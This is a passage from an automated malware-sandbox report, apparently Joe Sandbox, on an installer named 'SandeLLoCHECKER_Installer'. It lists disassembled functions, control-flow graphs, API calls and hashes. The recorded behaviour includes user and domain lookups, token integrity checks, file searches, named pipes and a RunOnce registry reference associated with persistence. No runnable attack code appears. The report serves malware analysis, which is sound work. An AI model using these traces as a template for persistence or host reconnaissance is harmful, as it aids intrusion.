                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Init_thread_footer$CreateCurrentHeapToken$AllocateCloseCountEventFindHandleInformationObjectOpenResourceSingleThreadTickUnothrow_t@std@@@WaitWow64Xtime_get_ticks__ehfuncinfo$??2@_wcsrchr
                                                                                                                        • String ID: /uninstall$VersionString$\/:*?"<>|$\\?\$Df
                                                                                                                        • API String ID: 2945862171-337833427
                                                                                                                        • Opcode ID: 4234a8528cec0eb61d21bb93d73aa092864cdb8595e4940c5d5eff13ed7803f6
                                                                                                                        • Instruction ID: 51f5a60fc0fcbbf4a3457e5874a2bf5a4e9a413ceefee26ba8967ffd85e1a0b3
                                                                                                                        • Opcode Fuzzy Hash: 4234a8528cec0eb61d21bb93d73aa092864cdb8595e4940c5d5eff13ed7803f6
                                                                                                                        • Instruction Fuzzy Hash: ABB2E172A00609DFDB14DFA8C845BAEBBB8FF44314F148269E419EB2D1DB74AD05CB91
                                                                                                                        Function 0084F620 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 267libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1549 84f620-84f677 1550 84f688-84f68f 1549->1550 1551 84f679-84f683 1549->1551 1552 84f691-84f6b3 LoadLibraryW GetProcAddress 1550->1552 1553 84f6b8-84f6bd 1550->1553 1557 84f954-84f971 call a15d9a 1551->1557 1552->1553 1554 84f6bf-84f6c7 1553->1554 1555 84f71a-84f72a RoGetActivationFactory 1553->1555 1558 84f6cd-84f6df 1554->1558 1559 84f72c-84f743 LoadLibraryW GetProcAddress 1555->1559 1560 84f77e-84f780 1555->1560 1561 84f6e1-84f6e4 call 84e560 1558->1561 1562 84f6e9-84f710 call a3d163 1558->1562 1565 84f745-84f74a 1559->1565 1566 84f74f-84f75f 1559->1566 1560->1558 1564 84f786-84f78b 1560->1564 1561->1562 1575 84f790-84f795 1562->1575 1576 84f712-84f718 1562->1576 1569 84f952 1564->1569 1565->1569 1573 84f771-84f77c 1566->1573 1574 84f761-84f76f 1566->1574 1569->1557 1573->1560 1574->1560 1577 84f797-84f79c call 8481d0 1575->1577 1576->1577 1580 84f7a1 1577->1580 1581 84f7a5-84f7b5 1580->1581 1582 84f906-84f913 call a3d173 1581->1582 1583 84f7bb-84f7ce 1581->1583 1592 84f915-84f91f 1582->1592 1585 84f7d0-84f7d2 1583->1585 1586 84f7e1-84f7e8 1583->1586 1585->1582 1589 84f7d8-84f7df 1585->1589 1586->1582 1587 84f7ee-84f7f3 1586->1587 1590 84f7f5-84f806 1587->1590 1591 84f808-84f80d call 84f5b0 1587->1591 1589->1585 1589->1586 1593 84f812-84f841 call 84ada0 LoadLibraryW 1590->1593 1591->1593 1595 84f921-84f929 call 848820 1592->1595 1596 84f92e-84f948 1592->1596 1602 84f843-84f857 1593->1602 1603 84f859-84f861 call 84f5b0 1593->1603 1595->1596 1596->1569 1598 84f94a-84f94d call 84e560 1596->1598 1598->1569 1604 84f866-84f868 1602->1604 1603->1604 1604->1580 1606 84f86e-84f87e GetProcAddress 1604->1606 1607 84f880-84f88f 1606->1607 1608 84f8bd-84f8ce FreeLibrary 1606->1608 1609 84f891-84f899 call 84e560 1607->1609 1610 84f89c-84f8a9 1607->1610 1608->1581 1609->1610 1614 84f8d3-84f8fa 1610->1614 1615 84f8ab-84f8b3 1610->1615 1614->1592 1617 84f8fc-84f904 call 84e560 1614->1617 1615->1608 1616 84f8b5-84f8b8 call 84e560 1615->1616 1616->1608 1617->1592
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,C7BA013E,00000000,000000B8,?,?,?,?,?,?,?,?,?,?,C7BA013E), ref: 0084F69B
                                                                                                                        • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 0084F6A1
                                                                                                                        • LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,00AAA29C,00000000,00000000,00000000), ref: 0084F82B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$AddressProc
                                                                                                                        • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                                                                                        • API String ID: 1469910268-2454113998
                                                                                                                        • Opcode ID: 39d721da6a24502b44f1230139e6d7d6f2b6bb0ff2d3873b9c2c9f3cd0d24a52
                                                                                                                        • Instruction ID: bc12c41af082ef0205cec4191017ea4fd0ddd55365c498bb8361cfbb153f215b
                                                                                                                        • Opcode Fuzzy Hash: 39d721da6a24502b44f1230139e6d7d6f2b6bb0ff2d3873b9c2c9f3cd0d24a52
                                                                                                                        • Instruction Fuzzy Hash: 71B16531D0020DEBDB14DFA8D885BAEBBB4FF58314F20412DE510E72A2EB74A944CB91
                                                                                                                        Function 0099F2B0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 529registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1668 99f2b0-99f349 GetUserNameW 1669 99f34b-99f354 GetLastError 1668->1669 1670 99f395-99f3d3 GetEnvironmentVariableW 1668->1670 1669->1670 1673 99f356-99f35e 1669->1673 1671 99f419-99f44c 1670->1671 1672 99f3d5-99f3da 1670->1672 1676 99f44e-99f461 1671->1676 1677 99f463-99f46b call 8481d0 1671->1677 1674 99f3dc-99f3f0 1672->1674 1675 99f3f2-99f3fc call 84f5b0 1672->1675 1678 99f360-99f374 1673->1678 1679 99f376-99f37e call 84f5b0 1673->1679 1680 99f401-99f413 GetEnvironmentVariableW 1674->1680 1675->1680 1682 99f470-99f4a5 call 8480a0 * 2 1676->1682 1677->1682 1684 99f383-99f393 GetUserNameW 1678->1684 1679->1684 1680->1671 1690 99f4d9-99f4f6 1682->1690 1691 99f4a7-99f4b9 1682->1691 1684->1670 1694 99f4f8-99f50a 1690->1694 1695 99f526-99f559 call a15d9a 1690->1695 1692 99f4bb-99f4c9 1691->1692 1693 99f4cf-99f4d6 call a15da8 1691->1693 1692->1693 1696 99f55a-99f5e1 call a1b22f call 99fa00 call 95e1d0 call 848860 1692->1696 1693->1690 1698 99f51c-99f523 call a15da8 1694->1698 1699 99f50c-99f51a 1694->1699 1713 99f60c-99f612 1696->1713 1714 99f5e3-99f609 call 94b6c0 1696->1714 1698->1695 1699->1696 1699->1698 1716 99f614 1713->1716 1717 99f616-99f645 call 848860 * 2 1713->1717 1714->1713 1716->1717 1724 99f655-99f6c8 call 8481d0 call 95e1d0 1717->1724 1725 99f647-99f64e RegCloseKey 1717->1725 1730 99f6ca-99f6dc 1724->1730 1731 99f6fc-99f713 1724->1731 1725->1724 1732 99f6de-99f6ec 1730->1732 1733 99f6f2-99f6f9 call a15da8 1730->1733 1734 99f73b-99f7a0 call 99fbb0 call 95e1d0 1731->1734 1735 99f715-99f736 call 94b6c0 1731->1735 1732->1733 1738 99f9f2 call a1b22f 1732->1738 1733->1731 1749 99f7ec-99f816 call 848860 * 2 1734->1749 1750 99f7a2-99f7cc call 848860 * 2 1734->1750 1735->1734 1743 99f9f7-99f9ff call a1b22f 1738->1743 1759 99f818-99f820 1749->1759 1760 99f82a-99f838 1749->1760 1761 99f7ce-99f7d6 1750->1761 1762 99f7e0-99f7ea 1750->1762 1759->1760 1764 99f83a 1760->1764 1765 99f83c-99f83d 1760->1765 1761->1762 1763 99f846-99f87f call 848860 * 3 1762->1763 1774 99f88b-99f8df call 8481d0 call 95e1d0 1763->1774 1775 99f881-99f884 RegCloseKey 1763->1775 1764->1765 1765->1763 1780 99f8e1-99f8f3 1774->1780 1781 99f913-99f92f 1774->1781 1775->1774 1784 99f909-99f910 call a15da8 1780->1784 1785 99f8f5-99f903 1780->1785 1782 99f96c-99f970 1781->1782 1783 99f931-99f966 call 94b6c0 1781->1783 1787 99f972 1782->1787 1788 99f974-99f9b5 call 848860 * 2 1782->1788 1783->1782 1784->1781 1785->1743 1785->1784 1787->1788 1797 99f9c4-99f9f1 call a15d9a 1788->1797 1798 99f9b7-99f9ba RegCloseKey 1788->1798 1798->1797
                                                                                                                        APIs
                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0099F345
                                                                                                                        • GetLastError.KERNEL32 ref: 0099F34B
                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0099F393
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 0099F3C9
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,00000000,00000000), ref: 0099F413
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000,C7BA013E), ref: 0099F648
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 0099F882
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 0099F9B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$EnvironmentNameUserVariable$ErrorLast
                                                                                                                        • String ID: Software$Software\Microsoft\Windows\CurrentVersion\RunOnce$UserDomain
                                                                                                                        • API String ID: 938064350-4079418357
                                                                                                                        • Opcode ID: bcdfa7985d6a73df2f8da45889e2cee7769d70851480bc9125dce3d3815461c0
                                                                                                                        • Instruction ID: 1b2f2302fcd8d734716af91f79a726577a55d1744bda9caad25f4aadd7f4496b
                                                                                                                        • Opcode Fuzzy Hash: bcdfa7985d6a73df2f8da45889e2cee7769d70851480bc9125dce3d3815461c0
                                                                                                                        • Instruction Fuzzy Hash: C1225A70D00249DFDF14DFA8C999BEEBBB4EF14304F208269E415A7291DB746A88CF91
                                                                                                                        Function 0095BF10 Relevance: 16.6, APIs: 11, Instructions: 117memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1941 95bf10-95bf6d GetCurrentProcess OpenProcessToken 1943 95bf7c-95bf9d GetTokenInformation 1941->1943 1944 95bf6f-95bf77 GetLastError 1941->1944 1946 95bf9f-95bfa8 GetLastError 1943->1946 1947 95bfcb-95bfcf 1943->1947 1945 95c03a-95c04d 1944->1945 1948 95c05d-95c079 call a15d9a 1945->1948 1949 95c04f-95c056 CloseHandle 1945->1949 1950 95c01e GetLastError 1946->1950 1951 95bfaa-95bfc9 call 95c080 GetTokenInformation 1946->1951 1947->1950 1952 95bfd1-95c000 AllocateAndInitializeSid 1947->1952 1949->1948 1953 95c024 1950->1953 1951->1947 1951->1950 1952->1953 1954 95c002-95c01c EqualSid FreeSid 1952->1954 1957 95c026-95c033 call a16458 1953->1957 1954->1957 1957->1945
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0095BF58
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0095BF65
                                                                                                                        • GetLastError.KERNEL32 ref: 0095BF6F
                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 0095BF99
                                                                                                                        • GetLastError.KERNEL32 ref: 0095BF9F
                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,?,?,?), ref: 0095BFC5
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0095BFF8
                                                                                                                        • EqualSid.ADVAPI32(00000000,?), ref: 0095C007
                                                                                                                        • FreeSid.ADVAPI32(?), ref: 0095C016
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0095C050
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$ErrorInformationLastProcess$AllocateCloseCurrentEqualFreeHandleInitializeOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 695978879-0
                                                                                                                        • Opcode ID: 7f9cd9618c469662e64e50daf8007e12496c14b4951bb69e6b1ee1bf820d009b
                                                                                                                        • Instruction ID: 55767ce231d856991f59d53b617df521a47e83a03ffe50dc6a9d2ac47cfd407f
                                                                                                                        • Opcode Fuzzy Hash: 7f9cd9618c469662e64e50daf8007e12496c14b4951bb69e6b1ee1bf820d009b
                                                                                                                        • Instruction Fuzzy Hash: 5A4129B1900209EFDF10DFA5CD49BEEBBB8EF09315F104025E811B3290EB799909DB64
                                                                                                                        Function 009866E0 Relevance: 15.8, APIs: 10, Instructions: 825COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1962 9866e0-986736 call 84abe0 1965 98673c-98675c call 84abe0 1962->1965 1966 988162-98816c call 84a8a0 1962->1966 1965->1966 1984 986762-9868e6 call 84abe0 1965->1984 1970 9881da-9881de 1966->1970 1971 98816e-988181 1966->1971 1975 9881ee-98820c 1970->1975 1976 9881e0-9881e7 CloseHandle 1970->1976 1973 98811b-98811c 1971->1973 1974 988183-988191 1971->1974 1980 98811e-988121 1973->1980 1981 988126 1973->1981 1978 98812b-988146 call a15d9a 1974->1978 1979 988193-9881d9 1974->1979 1982 98820e-988211 1975->1982 1983 988216-988233 call 94a230 1975->1983 1976->1975 1979->1970 1980->1981 1981->1978 1982->1983 1984->1966 1993 9868ec-986933 1984->1993 1995 986939-986947 call 84abe0 1993->1995 1996 987de4-987e30 call 9a59c0 1993->1996 1995->1966 2003 98694d-986aad call 949600 call 84a3d0 call a15dd9 call 9a5e00 call 84abe0 1995->2003 1999 987e35-987e3d 1996->1999 2001 987e4a-987e5a 1999->2001 2002 987e3f-987e45 1999->2002 2005 987e60-987e62 2001->2005 2006 987f52 2001->2006 2004 987f62-987f78 2002->2004 2003->1966 2060 986ab3-986bb4 call 8476d0 2003->2060 2010 987f7a-987f7d CloseHandle 2004->2010 2011 987f87-987fa0 2004->2011 2008 987e9d-987ed4 CreateThread 2005->2008 2009 987e64-987e7c CreateEventW 2005->2009 2007 987f58 2006->2007 2007->2004 2017 987edd-987ef6 WaitForSingleObject GetExitCodeThread 2008->2017 2018 987ed6-987ed8 2008->2018 2013 987e7e-987e8f 2009->2013 2014 987e95-987e98 2009->2014 2010->2011 2015 987faf-987fd6 2011->2015 2016 987fa2-987fa5 CloseHandle 2011->2016 2013->2014 2014->2008 2020 987fd8-987fdb 2015->2020 2021 987fe0-988005 call 94a230 2015->2021 2016->2015 2023 987ef8-987f1a 2017->2023 2024 987f2b-987f3b 2017->2024 2018->2017 2020->2021 2033 98800b 2021->2033 2034 9880ae-9880ba 2021->2034 2023->2004 2025 987f1c-987f29 CloseHandle 2023->2025 2024->2006 2026 987f3d-987f50 CloseHandle 2024->2026 2025->2004 2026->2007 2035 988010-988012 2033->2035 2036 9880bc-9880c5 call a1fcc9 2034->2036 2037 9880cf-9880fa 2034->2037 2039 988158-98815d call 84a8a0 2035->2039 2040 988018-98801a 2035->2040 2036->2037 2043 9880fc-9880ff 2037->2043 2044 988104-98811a 2037->2044 2039->1966 2040->2039 2045 988020-988031 2040->2045 2043->2044 2044->1973 2049 98809e-9880a5 2045->2049 2050 988037-988074 call 848860 2045->2050 2049->2035 2054 9880ab 2049->2054 2057 98807e-98809b call 9a5f80 call a15da8 2050->2057 2058 988076-988079 2050->2058 2054->2034 2057->2049 2058->2057 2060->2039 2071 986bba-986bc0 2060->2071 2071->2039 2072 986bc6-987060 2071->2072 2072->2039 2074 987066-98706d 2072->2074 2074->2039 2075 987073-98707f 2074->2075 2075->2039 2076 987085-98712e call 95bcc0 call 862300 2075->2076 2076->2039 2084 987134-98713b 2076->2084 2084->2039 2085 987141-987147 2084->2085 2085->2039 2086 98714d-98716d 2085->2086 2087 987170-987179 2086->2087 2087->2087 2088 98717b-98768d call 8481d0 call 8476d0 call 952130 call 9529a0 call 951e50 call 946cd0 call 84a3d0 call a18120 FindFirstFileW 2087->2088 2117 987690-987699 2088->2117 2117->2117 2118 98769b-98793d call 8481d0 call 8476d0 call 952130 call 9529a0 call 848860 call 84a3d0 2117->2118 2134 987940-987949 2118->2134 2134->2134 2135 98794b-987d67 call 8481d0 call 8476d0 call 952130 call 9529a0 call 848860 2134->2135 2135->1996
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • CloseHandle.KERNEL32(80004005,C7BA013E,74DF34C0,00000000), ref: 009881E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$CloseHandleHeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2534622057-0
                                                                                                                        • Opcode ID: 70c394e63fe736efa25b30e9726ea3f2e9b863392db2f366440ccc312ff8aa13
                                                                                                                        • Instruction ID: 0133c5eec1cd49ca2a4a6c08831343f8325f138cd642285f58a10b9bd9e2a234
                                                                                                                        • Opcode Fuzzy Hash: 70c394e63fe736efa25b30e9726ea3f2e9b863392db2f366440ccc312ff8aa13
                                                                                                                        • Instruction Fuzzy Hash: 8682CBB0904658CFDB20DF68CD4479EBBB4AF46314F2482D9D548AB382DB749E85CF91
                                                                                                                        Function 009689C0 Relevance: 7.8, APIs: 5, Instructions: 315COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(?,00000000,?,00000100), ref: 00968ABC
                                                                                                                        • LoadStringW.USER32(?,00000000,?,00000001), ref: 00968BDD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2948472770-0
                                                                                                                        • Opcode ID: 2bce51bea004eb438d1073bdf79345b1ba8a937758099cc6417f3b700bd53032
                                                                                                                        • Instruction ID: b858472d6435a87d6a81fb6df39993dd31bd6a4f9be6cbf8f145f747afe4b250
                                                                                                                        • Opcode Fuzzy Hash: 2bce51bea004eb438d1073bdf79345b1ba8a937758099cc6417f3b700bd53032
                                                                                                                        • Instruction Fuzzy Hash: 06C18E71D00249DBDB04DFA8CD45BEEBBB5FF44304F148329E415AB280EB786A85CB91
                                                                                                                        Function 00992D90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00992E6A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                        • String ID: \$\$\
                                                                                                                        • API String ID: 1705453755-3791832595
                                                                                                                        • Opcode ID: 117d2dccee2cd864cb2b8bcc41c8ef71172182aa199b5683cb5a86cd9760591d
                                                                                                                        • Instruction ID: 9522544773dc387b097db8470e0a0c97d2450cca7dcfe051cb256aa8db3b62a0
                                                                                                                        • Opcode Fuzzy Hash: 117d2dccee2cd864cb2b8bcc41c8ef71172182aa199b5683cb5a86cd9760591d
                                                                                                                        • Instruction Fuzzy Hash: 0741D122E04315DBCF30DFA88484AABB3E8FF98354F154A2EE8C897140E7208DC583C6
                                                                                                                        Function 0091D900 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0091D941
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                          • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,00A7402D,000000FF), ref: 0091DA14
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$DirectoryFindHeapLibraryLoadProcessResourceSystem
                                                                                                                        • String ID: UxTheme.dll
                                                                                                                        • API String ID: 2586271605-352951104
                                                                                                                        • Opcode ID: cc8de62d3ba334beaf691845356f28f3e4dd0b41675c8e48d7f520fbd5c36968
                                                                                                                        • Instruction ID: f6576cd75a6a1bf4bfe01be96208466e727a8f799e237cd6cb9fdda9faf55e3f
                                                                                                                        • Opcode Fuzzy Hash: cc8de62d3ba334beaf691845356f28f3e4dd0b41675c8e48d7f520fbd5c36968
                                                                                                                        • Instruction Fuzzy Hash: 24A1ACB0601649EFE714CF68C818BDABBF4FF04318F24865DD4199B681D7BAA619CF81
                                                                                                                        Function 009A0970 Relevance: 3.1, APIs: 2, Instructions: 86filepipeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00007F90,00007F90,00001388,00000000,?,C7BA013E,C7BA013E,?,?,?,?,00000000), ref: 009A09F9
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,C7BA013E,C7BA013E,?,?,?,?,00000000,00A8BD55), ref: 009A0A1A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
